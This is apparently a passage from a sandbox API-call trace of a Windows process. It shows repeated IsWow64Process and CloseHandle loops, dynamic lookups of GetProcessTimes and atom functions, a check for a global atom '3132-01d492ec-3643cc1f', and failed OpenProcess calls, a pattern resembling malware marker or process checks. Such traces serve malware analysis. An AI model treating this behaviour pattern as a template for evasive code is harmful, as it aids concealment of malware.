	[0136.405] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.405] CloseHandle (hObject=0x2dc) returned 1
	[0136.406] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.406] CloseHandle (hObject=0x2dc) returned 1
	[0136.406] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.406] CloseHandle (hObject=0x2dc) returned 1
	[0136.406] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.406] CloseHandle (hObject=0x2dc) returned 1
	[0136.406] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.406] CloseHandle (hObject=0x2dc) returned 1
	[0136.407] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.407] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.407] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.407] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.408] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.408] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.408] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.408] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.408] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.408] CloseHandle (hObject=0x2dc) returned 1
	[0136.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.408] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.409] CloseHandle (hObject=0x2dc) returned 1
	[0136.409] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.409] CloseHandle (hObject=0x2dc) returned 1
	[0136.409] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.409] CloseHandle (hObject=0x2dc) returned 1
	[0136.409] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.409] CloseHandle (hObject=0x2dc) returned 1
	[0136.410] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.410] CloseHandle (hObject=0x2dc) returned 1
	[0136.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.442] CloseHandle (hObject=0x2dc) returned 1
	[0136.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.442] CloseHandle (hObject=0x2dc) returned 1
	[0136.442] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.442] CloseHandle (hObject=0x2dc) returned 1
	[0136.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.443] CloseHandle (hObject=0x2dc) returned 1
	[0136.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.443] CloseHandle (hObject=0x2dc) returned 1
	[0136.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.443] CloseHandle (hObject=0x2dc) returned 1
	[0136.443] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.443] CloseHandle (hObject=0x2dc) returned 1
	[0136.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.444] CloseHandle (hObject=0x2dc) returned 1
	[0136.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.444] CloseHandle (hObject=0x2dc) returned 1
	[0136.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.444] CloseHandle (hObject=0x2dc) returned 1
	[0136.444] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.444] CloseHandle (hObject=0x2dc) returned 1
	[0136.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.445] CloseHandle (hObject=0x2dc) returned 1
	[0136.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.445] CloseHandle (hObject=0x2dc) returned 1
	[0136.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.445] CloseHandle (hObject=0x2dc) returned 1
	[0136.445] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.445] CloseHandle (hObject=0x2dc) returned 1
	[0136.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.446] CloseHandle (hObject=0x2dc) returned 1
	[0136.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.446] CloseHandle (hObject=0x2dc) returned 1
	[0136.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.446] CloseHandle (hObject=0x2dc) returned 1
	[0136.446] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.446] CloseHandle (hObject=0x2dc) returned 1
	[0136.447] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.447] CloseHandle (hObject=0x2dc) returned 1
	[0136.447] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.447] CloseHandle (hObject=0x2dc) returned 1
	[0136.447] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.447] CloseHandle (hObject=0x2dc) returned 1
	[0136.447] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.447] CloseHandle (hObject=0x2dc) returned 1
	[0136.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.448] CloseHandle (hObject=0x2dc) returned 1
	[0136.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.448] CloseHandle (hObject=0x2dc) returned 1
	[0136.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.448] CloseHandle (hObject=0x2dc) returned 1
	[0136.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.448] CloseHandle (hObject=0x2dc) returned 1
	[0136.448] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.449] CloseHandle (hObject=0x2dc) returned 1
	[0136.449] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.449] CloseHandle (hObject=0x2dc) returned 1
	[0136.449] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.449] CloseHandle (hObject=0x2dc) returned 1
	[0136.449] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.450] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.450] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.450] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.451] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.451] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.451] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.451] CloseHandle (hObject=0x2dc) returned 1
	[0136.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.451] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.451] CloseHandle (hObject=0x2dc) returned 1
	[0136.451] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.451] CloseHandle (hObject=0x2dc) returned 1
	[0136.452] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.452] CloseHandle (hObject=0x2dc) returned 1
	[0136.452] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.452] CloseHandle (hObject=0x2dc) returned 1
	[0136.452] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.452] CloseHandle (hObject=0x2dc) returned 1
	[0136.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.485] CloseHandle (hObject=0x2dc) returned 1
	[0136.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.485] CloseHandle (hObject=0x2dc) returned 1
	[0136.485] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.485] CloseHandle (hObject=0x2dc) returned 1
	[0136.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.486] CloseHandle (hObject=0x2dc) returned 1
	[0136.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.486] CloseHandle (hObject=0x2dc) returned 1
	[0136.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.486] CloseHandle (hObject=0x2dc) returned 1
	[0136.486] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.487] CloseHandle (hObject=0x2dc) returned 1
	[0136.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.487] CloseHandle (hObject=0x2dc) returned 1
	[0136.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.487] CloseHandle (hObject=0x2dc) returned 1
	[0136.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.487] CloseHandle (hObject=0x2dc) returned 1
	[0136.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.487] CloseHandle (hObject=0x2dc) returned 1
	[0136.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.488] CloseHandle (hObject=0x2dc) returned 1
	[0136.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.488] CloseHandle (hObject=0x2dc) returned 1
	[0136.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.488] CloseHandle (hObject=0x2dc) returned 1
	[0136.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.488] CloseHandle (hObject=0x2dc) returned 1
	[0136.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.489] CloseHandle (hObject=0x2dc) returned 1
	[0136.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.489] CloseHandle (hObject=0x2dc) returned 1
	[0136.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.489] CloseHandle (hObject=0x2dc) returned 1
	[0136.489] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.489] CloseHandle (hObject=0x2dc) returned 1
	[0136.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.490] CloseHandle (hObject=0x2dc) returned 1
	[0136.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.490] CloseHandle (hObject=0x2dc) returned 1
	[0136.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.490] CloseHandle (hObject=0x2dc) returned 1
	[0136.490] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.490] CloseHandle (hObject=0x2dc) returned 1
	[0136.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.491] CloseHandle (hObject=0x2dc) returned 1
	[0136.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.491] CloseHandle (hObject=0x2dc) returned 1
	[0136.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.491] CloseHandle (hObject=0x2dc) returned 1
	[0136.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.491] CloseHandle (hObject=0x2dc) returned 1
	[0136.491] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.491] CloseHandle (hObject=0x2dc) returned 1
	[0136.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.492] CloseHandle (hObject=0x2dc) returned 1
	[0136.492] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.492] CloseHandle (hObject=0x2dc) returned 1
	[0136.492] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.493] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.493] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.493] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.493] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.493] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.494] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.494] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.494] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.494] CloseHandle (hObject=0x2dc) returned 1
	[0136.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.494] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.494] CloseHandle (hObject=0x2dc) returned 1
	[0136.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.495] CloseHandle (hObject=0x2dc) returned 1
	[0136.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.495] CloseHandle (hObject=0x2dc) returned 1
	[0136.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.495] CloseHandle (hObject=0x2dc) returned 1
	[0136.495] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.495] CloseHandle (hObject=0x2dc) returned 1
	[0136.528] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.528] CloseHandle (hObject=0x2dc) returned 1
	[0136.529] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.529] CloseHandle (hObject=0x2dc) returned 1
	[0136.529] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.529] CloseHandle (hObject=0x2dc) returned 1
	[0136.529] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.529] CloseHandle (hObject=0x2dc) returned 1
	[0136.529] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.529] CloseHandle (hObject=0x2dc) returned 1
	[0136.530] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.530] CloseHandle (hObject=0x2dc) returned 1
	[0136.530] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.530] CloseHandle (hObject=0x2dc) returned 1
	[0136.530] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.530] CloseHandle (hObject=0x2dc) returned 1
	[0136.530] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.530] CloseHandle (hObject=0x2dc) returned 1
	[0136.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.531] CloseHandle (hObject=0x2dc) returned 1
	[0136.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.531] CloseHandle (hObject=0x2dc) returned 1
	[0136.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.531] CloseHandle (hObject=0x2dc) returned 1
	[0136.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.531] CloseHandle (hObject=0x2dc) returned 1
	[0136.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.532] CloseHandle (hObject=0x2dc) returned 1
	[0136.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.532] CloseHandle (hObject=0x2dc) returned 1
	[0136.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.532] CloseHandle (hObject=0x2dc) returned 1
	[0136.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.532] CloseHandle (hObject=0x2dc) returned 1
	[0136.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.532] CloseHandle (hObject=0x2dc) returned 1
	[0136.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.533] CloseHandle (hObject=0x2dc) returned 1
	[0136.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.533] CloseHandle (hObject=0x2dc) returned 1
	[0136.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.533] CloseHandle (hObject=0x2dc) returned 1
	[0136.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.533] CloseHandle (hObject=0x2dc) returned 1
	[0136.533] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.534] CloseHandle (hObject=0x2dc) returned 1
	[0136.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.534] CloseHandle (hObject=0x2dc) returned 1
	[0136.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.534] CloseHandle (hObject=0x2dc) returned 1
	[0136.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.534] CloseHandle (hObject=0x2dc) returned 1
	[0136.534] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.534] CloseHandle (hObject=0x2dc) returned 1
	[0136.535] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.535] CloseHandle (hObject=0x2dc) returned 1
	[0136.535] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.535] CloseHandle (hObject=0x2dc) returned 1
	[0136.535] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.535] CloseHandle (hObject=0x2dc) returned 1
	[0136.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.536] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0136.536] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0136.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.536] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0136.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0136.537] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0136.537] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0136.537] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0136.537] CloseHandle (hObject=0x2dc) returned 1
	[0136.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0136.537] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.537] CloseHandle (hObject=0x2dc) returned 1
	[0136.537] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.537] CloseHandle (hObject=0x2dc) returned 1
	[0136.537] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.537] CloseHandle (hObject=0x2dc) returned 1
	[0136.538] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.538] CloseHandle (hObject=0x2dc) returned 1
	[0136.538] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.538] CloseHandle (hObject=0x2dc) returned 1
	[0136.572] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.572] CloseHandle (hObject=0x2dc) returned 1
	[0136.572] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.572] CloseHandle (hObject=0x2dc) returned 1
	[0136.572] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.572] CloseHandle (hObject=0x2dc) returned 1
	[0136.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.573] CloseHandle (hObject=0x2dc) returned 1
	[0136.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.573] CloseHandle (hObject=0x2dc) returned 1
	[0136.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.573] CloseHandle (hObject=0x2dc) returned 1
	[0136.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.573] CloseHandle (hObject=0x2dc) returned 1
	[0136.573] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.574] CloseHandle (hObject=0x2dc) returned 1
	[0136.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.574] CloseHandle (hObject=0x2dc) returned 1
	[0136.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.574] CloseHandle (hObject=0x2dc) returned 1
	[0136.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.574] CloseHandle (hObject=0x2dc) returned 1
	[0136.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.574] CloseHandle (hObject=0x2dc) returned 1
	[0136.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.575] CloseHandle (hObject=0x2dc) returned 1
	[0136.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.575] CloseHandle (hObject=0x2dc) returned 1
	[0136.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.575] CloseHandle (hObject=0x2dc) returned 1
	[0136.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.575] CloseHandle (hObject=0x2dc) returned 1
	[0136.576] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.576] CloseHandle (hObject=0x2dc) returned 1
	[0136.576] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.576] CloseHandle (hObject=0x2dc) returned 1
	[0136.576] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.576] CloseHandle (hObject=0x2dc) returned 1
	[0136.576] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0136.576] CloseHandle (hObject=0x2dc) returned 1
